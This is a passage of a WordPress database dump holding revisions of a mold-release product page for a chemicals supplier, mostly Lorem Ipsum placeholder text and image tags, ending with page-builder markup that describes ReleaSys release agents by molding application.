1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Fiberglass Mold Release</strong></h4>\r\n<img class="wp-image-4102 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_195767891-340x340.jpg" alt="industrial-medical coatings" width="170" height="170" />\r\n<p class="alignnone"><img class="wp-image-1877 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3140-340x340.jpg" alt="Epikure 3140 Curing agent" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.</p>\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Pre-Cast Mold Release Mold Release</strong></h4>\r\n<img class="wp-image-3723 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_359496941-340x340.jpg" alt="Krytox GB A2" width="170" height="170" />\r\n\r\n<img class="wp-image-1884 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3290-340x340.jpg" alt="epikure-3290" width="170" height="170" />\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Release Agent Applications', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-05-30 18:43:39', '2017-05-30 18:43:39', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4347, 2, '2017-05-30 18:43:58', '2017-05-30 18:43:58', '<h3 style="text-align: left;"><strong>Summary of Release Agents by Application HERE</strong></h3>\r\nA wonderful serenity has taken possession of my entire soul, like these sweet mornings of spring which I enjoy with my whole heart. I am alone, and feel the charm of existence in this spot, which was created for the bliss of souls like mine. I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment; and yet I feel that I never was a greater artist than now. When, while the lovely valley teems with vapour around me, and the meridian sun strikes the upper surface of the impenetrable foliage of my trees, and but a few stray gleams steal into the inner sanctuary, I throw myself down among the tall grass by the trickling stream; and, as I lie close to the earth, a thousand unknown plants are noticed by me: when I hear the buzz of the little world among the stalks, and grow familiar with the countless indescribable forms of the insects and flies, then I feel the presence of the Almighty, who formed us in his own image, and the breath\r\n\r\n<strong>Advanced Composites Mold Release</strong>\r\n<div>\r\n\r\n<img class="wp-image-4287 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_530979514-340x340.jpg" alt="specialty mold release" width="168" height="168" />\r\n\r\n<img class=" wp-image-1918 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/HELOXY-505-340x340.jpg" alt="heloxy-505" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n</div>\r\n&nbsp;\r\n\r\n[product id="" sku=""]\r\n<h4><strong>Rotational Plastics Mold Release</strong></h4>\r\n<img class="wp-image-4282 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_566838472-340x340.jpg" alt="PTFE release" width="170" height="170" />\r\n\r\n<img class="wp-image-1917 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/HELOXY-116-340x340.jpg" alt="heloxy-116" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"><strong>Polyurethane Mold Release</strong></h4>\r\n<p style="text-align: left;"><img class=" wp-image-4289 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_116206609-340x340.jpg" alt="Concrete Release Agent" width="170" height="170" /></p>\r\n<img class="wp-image-1897 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-872-340x340.jpg" alt="epon-872" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"><strong>Rubber Mold Release</strong></h4>\r\n<p style="text-align: left;"><img class=" wp-image-4179 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_375261412-340x340.jpg" alt="ReleaSys 8500 Rubber mold release agent" width="170" height="170" /></p>\r\n<img class="wp-image-1890 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-825-340x340.jpg" alt="EPON 825 EPON Resin 825" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Injection Plastics Mold Release</strong></h4>\r\n<img class=" wp-image-4105 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_280244540-340x340.jpg" alt="Industrial Wire Coatings" width="170" height="170" />\r\n\r\n<img class="wp-image-1894 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-830-340x340.jpg" alt="Epon 830" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Fiberglass Mold Release</strong></h4>\r\n<img class="wp-image-4102 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_195767891-340x340.jpg" alt="industrial-medical coatings" width="170" height="170" />\r\n<p class="alignnone"><img class="wp-image-1877 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3140-340x340.jpg" alt="Epikure 3140 Curing agent" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.</p>\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Pre-Cast Mold Release Mold Release</strong></h4>\r\n<img class="wp-image-3723 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_359496941-340x340.jpg" alt="Krytox GB A2" width="170" height="170" />\r\n\r\n<img class="wp-image-1884 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3290-340x340.jpg" alt="epikure-3290" width="170" height="170" />\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Release Agent Applications', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-05-30 18:43:58', '2017-05-30 18:43:58', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4348, 2, '2017-05-30 18:44:20', '2017-05-30 18:44:20', '<h3 style="text-align: left;"><strong>Summary of Release Agents by Application HERE</strong></h3>\r\nA wonderful serenity has taken possession of my entire soul, like these sweet mornings of spring which I enjoy with my whole heart. I am alone, and feel the charm of existence in this spot, which was created for the bliss of souls like mine. I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment; and yet I feel that I never was a greater artist than now. When, while the lovely valley teems with vapour around me, and the meridian sun strikes the upper surface of the impenetrable foliage of my trees, and but a few stray gleams steal into the inner sanctuary, I throw myself down among the tall grass by the trickling stream; and, as I lie close to the earth, a thousand unknown plants are noticed by me: when I hear the buzz of the little world among the stalks, and grow familiar with the countless indescribable forms of the insects and flies, then I feel the presence of the Almighty, who formed us in his own image, and the breath\r\n\r\n<strong>Advanced Composites Mold Release</strong>\r\n<div>\r\n\r\n<img class="wp-image-4287 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_530979514-340x340.jpg" alt="specialty mold release" width="168" height="168" />\r\n\r\n<img class=" wp-image-1918 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/HELOXY-505-340x340.jpg" alt="heloxy-505" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong>Rotational Plastics Mold Release</strong>\r\n\r\n<img class="wp-image-4282 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_566838472-340x340.jpg" alt="PTFE release" width="170" height="170" />\r\n\r\n<img class="wp-image-1917 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/HELOXY-116-340x340.jpg" alt="heloxy-116" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"><strong>Polyurethane Mold Release</strong></h4>\r\n<p style="text-align: left;"><img class=" wp-image-4289 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_116206609-340x340.jpg" alt="Concrete Release Agent" width="170" height="170" /></p>\r\n<img class="wp-image-1897 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-872-340x340.jpg" alt="epon-872" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"><strong>Rubber Mold Release</strong></h4>\r\n<p style="text-align: left;"><img class=" wp-image-4179 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_375261412-340x340.jpg" alt="ReleaSys 8500 Rubber mold release agent" width="170" height="170" /></p>\r\n<img class="wp-image-1890 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-825-340x340.jpg" alt="EPON 825 EPON Resin 825" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Injection Plastics Mold Release</strong></h4>\r\n<img class=" wp-image-4105 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_280244540-340x340.jpg" alt="Industrial Wire Coatings" width="170" height="170" />\r\n\r\n<img class="wp-image-1894 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-830-340x340.jpg" alt="Epon 830" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Fiberglass Mold Release</strong></h4>\r\n<img class="wp-image-4102 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_195767891-340x340.jpg" alt="industrial-medical coatings" width="170" height="170" />\r\n<p class="alignnone"><img class="wp-image-1877 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3140-340x340.jpg" alt="Epikure 3140 Curing agent" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.</p>\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Pre-Cast Mold Release Mold Release</strong></h4>\r\n<img class="wp-image-3723 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_359496941-340x340.jpg" alt="Krytox GB A2" width="170" height="170" />\r\n\r\n<img class="wp-image-1884 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3290-340x340.jpg" alt="epikure-3290" width="170" height="170" />\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Release Agent Applications', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-05-30 18:44:20', '2017-05-30 18:44:20', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4349, 3, '2017-06-01 16:26:39', '2017-06-01 16:26:39', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\r\n\r\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\r\n\r\n[text_box text_color="dark" hover="fade-out" width="95" scale="79" padding="5px 30px 10px 30px" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\r\n\r\nMiller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[divider]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4351" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Advanced Composites</h2>\r\nModern composites and fiber-reinforced materials demand innovative, efficient mold release solutions.Products for this applicationneed to cure quickly, adhere strongly to the mold surface, and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ by providing a single-coat agent that does not require sealers or primers.\r\n\r\n[button text="ReleaSys™ 8900 &amp; 9900"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4360" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Rotational Plastics (Rotomolding)</h2>\r\nRotational Molding is a dynamic industry which utilizesan ever-widening variety of thermoplastic resins.In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolreance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, uniformity and multiple releases per application\r\n\r\n[button text="ReleaSys™ RM"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4366" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Polyurethane-TPU</h2>\r\nMiller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants polyurethane can be molded (High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands of a release agent very high.Miller-Stephenson’s <b>ReleaSys™</b> release systems has specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenacious to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass provide critical protection to your mold surface and highly effective release properties.\r\n\r\n[button text="ReleaSys™ 8800"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4387" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Rubber / Silicone / Elastomers</h2>\r\nFrom Fluorosilicones to EPDM, Natural Rubber to Nitrile, and all other elastomers,Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years.Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers the ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is non-silicone, water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.\r\n\r\n[button text="ReleaSys™ 8200"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4332" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Injection Plastics Mold Release</h2>\r\nThere are numerous resins used in plastic injection molding, however regardless of the substrate critical performance criteria exist for all mold release used: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.\r\n\r\n[button text="ReleaSys™ 9800"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4337" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Fiberglass Mold Release</h2>\r\nMiller-Stephenson delivers most durable, highest performing mold release agents to the aerospace and fiberglass industry. Our products provide multiple releases, critical tooling protection, and no transfer from only a single coat.No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.\r\n\r\n[button text="ReleaSys™ 9900"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4391"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Pre-Cast / Reinformed Concrete</h2>\r\nMiller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..\r\n\r\n[button text="ReleaSys™ CR"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider]\r\n\r\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-autosave-v1', '', '', '2017-06-01 16:26:39', '2017-06-01 16:26:39', '', 4321, 'https://www.miller-stephenson.com/4321-autosave-v1/', 0, 'revision', '', 0); 
